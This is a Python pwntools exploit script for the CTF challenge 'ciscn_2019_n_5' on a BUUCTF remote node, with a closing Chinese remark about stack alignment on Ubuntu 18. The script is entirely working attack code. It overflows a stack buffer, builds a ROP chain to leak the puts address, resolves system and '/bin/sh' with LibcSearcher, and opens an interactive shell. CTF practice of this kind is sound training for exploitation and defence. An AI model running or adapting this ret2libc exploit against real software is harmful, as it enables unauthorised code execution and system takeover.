exp
#!/usr/bin/env python3
# coding=utf-8
from pwn import *
from LibcSearcher import *
context(log_level = 'debug')
proc_name = './ciscn_2019_n_5'
# p = process(proc_name)
p = remote('node3.buuoj.cn', 28451)
elf = ELF(proc_name)
p.sendline('a'.encode())
p.recvuntil('me?\n')
pop_rdi_ret = 0x400713
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']
# bin_sh_str
payload = 'a'.encode() * (0x20 + 8) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
p.recv()
p.sendline('a'.encode())
p.recvuntil('me?\n')
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_sh_str = libc_base + libc.dump('str_bin_sh')
ret = 0x4004c9
payload1 = 'a'.encode() * (0x20 + 8) +p64(ret) + p64(pop_rdi_ret) + p64(bin_sh_str) + p64(system_addr)
p.sendline(payload1)
p.interactive()
ubuntu18要注意栈对齐,ubuntu16就不需要!
